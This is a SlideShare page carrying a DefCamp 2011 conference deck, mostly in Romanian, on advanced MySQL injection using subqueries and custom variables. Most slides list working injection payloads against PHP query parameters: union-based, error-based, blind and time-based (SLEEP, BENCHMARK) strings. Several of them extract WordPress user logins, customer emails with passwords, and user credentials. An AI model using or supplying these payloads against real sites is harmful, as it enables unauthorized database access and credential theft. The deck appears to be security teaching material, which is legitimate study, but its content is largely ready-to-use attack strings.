DEFCAMP – 2011<br />“Advanced Data Mining <br />               in MySQL Injections <br />using Subqueries & Custom Variabl...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
Advanced Data Mining  in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________...
………<br />
Upcoming SlideShare
Loading in …5
×

Advanced data mining in my sql injections using subqueries and custom variables

8,549 views

Published on

Published in: Technology
2 Comments
3 Likes
Statistics
Notes
No Downloads
Views
Total views
8,549
On SlideShare
0
From Embeds
0
Number of Embeds
2,661
Actions
Shares
0
Downloads
134
Comments
2
Likes
3
Embeds 0
No embeds

No notes for slide
  • 127.0.0.1/defcamp/0_o/index.php?id=2&apos;+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login&gt;@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
  • 127.0.0.1/defcamp/0_o/index.php?id=2&apos;+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login&gt;@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
  • Advanced data mining in my sql injections using subqueries and custom variables

    1. 1. DEFCAMP – 2011<br />“Advanced Data Mining <br /> in MySQL Injections <br />using Subqueries & Custom Variables”<br />
    2. 2. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />- CUPRINS -<br />[ * ] Notiuni introductive: SQL , Injectii SQL<br />[ * ] Variabile Particularizate si Sub-Interogari in MySQL<br />[ * ] Optimizarea tehnicilor clasice de extragere a informatiilor : <br />- variabile MySQL ( Server System Variables / Session Variables )<br /> - bazele de date disponibile ( schema_name / SCHEMATA )<br /> - tabelele si coloanele aferente acestora ( table_name / column_name ) <br /> - privilegii ( USER_PRIVILEGES : GRANTEE/PRIVILEGE_TYPE/IS_GRANTABLE ) <br />- citirea & scrierea fisierelor ( LOAD_FILE / INTO DUMPFILE - OUTFILE)<br />- atacuri Denial of Service ( DOS )<br />
    3. 3. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Structured Query Language (SQL - limbajul structurat de interogare) este limbajul standard folosit pentru manipularea si regasirea datelor din baze de date relationale. Prin SQL, un programator sau un administrator de baze de date poate face urmatoarele lucruri:<br />* sa modifice structura unei baze de date ; * sa schimbe valorile de configurare pentru securitatea sistemului; * sa adauge drepturi utilizatorilor asupra bazelor de date sau tabelelor; * sa interogheze o baza de date asupra unor informatii; * sa actualizeze continutul unei baze de date. <br />
    4. 4. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Cum functioneaza PHP + MySQL ? <br />< request-ul efectuat de catre client<br />< procesarea request-ului la nivel de server<br />< raspunsul trimis catre client <br /> ca rezultat al cererii <br />
    5. 5. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br /> What could possibly go wrong ?<br />!!!!!!<br />
    6. 6. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />SQL Injections ( Injectii SQL ) – tehnica de malformare a sintaxei SQL datorata modificarii valorilor parametrilor $_GET, $_POST, cookies, headers, ce sunt preluate si prelucrate de fisierele server-side fara a filtra in prealabil caractere sau comenzi ce pot fi periculoase.<br />
    7. 7. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Exemplu de injectie MySQL clasica.<br />
    8. 8. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Tipuri de injectii SQL : UNION BASED<br />index.php?id=1’ and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --<br />index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1<br />index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--<br />index.php? id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2<br />index.php?id=1+and+1=0+union+select+ sql_no_cache+1,2,3,4,5<br />
    9. 9. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Tipuri de injectii SQL : UNION BASED<br />
    10. 10. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Tipuri de injectii SQL : ERROR BASED<br />index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+<br />Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+<br />news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1-- +<br />details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--<br />?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--<br />
    11. 11. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Tipuri de injectii SQL : ERROR BASED<br />
    12. 12. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Tipuri de injectii SQL : BLIND<br />index.php?id=1’ and substring(@@version,1,1)=4--<br />index.php?id=1’ and substring(@@version,1,1)=5--<br />index.php?id=1 and (SELECT 1 from admin limit 0,1)=1<br />news.php?id = -1 'OR id = IF(ASCII(SUBSTRING (SELECT USER ()), 1, 1 )))>= 100, 1, SLEEP (3)) <br />index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1 )))>1<br />index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103<br />script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) –<br />script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) --<br />
    13. 13. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Tipuri de injectii SQL : BLIND<br />
    14. 14. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />MySQL Custom Variables (Variabile Particularizate)<br />
    15. 15. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />MySQL Sub-Queries (Sub-Interogari)<br />SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);<br />
    16. 16. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Injectii MySQL - folosind Custom Variables :<br />CLASIC SYNTAX : index.php?id=2’+and+1=0+union+select+1,2,3,4,5--<br />NEW SYNTAX: index.php?id=2’+and+1=0+union+select+@i:=version(),@i,@i,@i,@i--<br />@i:=concat( version(),0x3a,database() )<br />@i:=cast(version()+as+binary)<br />@i:=convert(version(),binary)<br />@i:=convert(version()+using+latin1)<br />@i:=aes_decrypt(aes_encrypt(version(),1),1)<br />@x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)<br />
    17. 17. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Injectii MySQL - folosind SubQueries :<br />index.php?id = -1+union+select+*+from+users,(select+1,2,3,4,5,6)a--<br />index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select1,2,3,4,5)--+--X<br />id=3 AND (SELECT 7574 FROM(SELECT COUNT(*) ,CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)), CHAR(58,101,118,118,58), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)<br />
    18. 18. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Injectii MySQL - folosind SubQueries + Custom Variables :<br />index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00) , (select (null) from (information_schema.columns) where (table_schema!=‘information_schema’) and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4--<br />index.php?id=-1 Union select 1,2, concat(@i:=0x00,@o:=0x0d0a, benchmark(150, @o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail > @i+order+by+mail+LIMIT+1+))),o),4 <br />index.php?id=-7’ union (select * from (select @i:=version())q join (select@i)w join (select@i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx<br />
    19. 19. Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables<br />_______________________________________________________________________<br />Injectii MySQL - folosind SubQueries + Custom Variables :<br />index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--<br />
    20. 20. ………<br />

    ×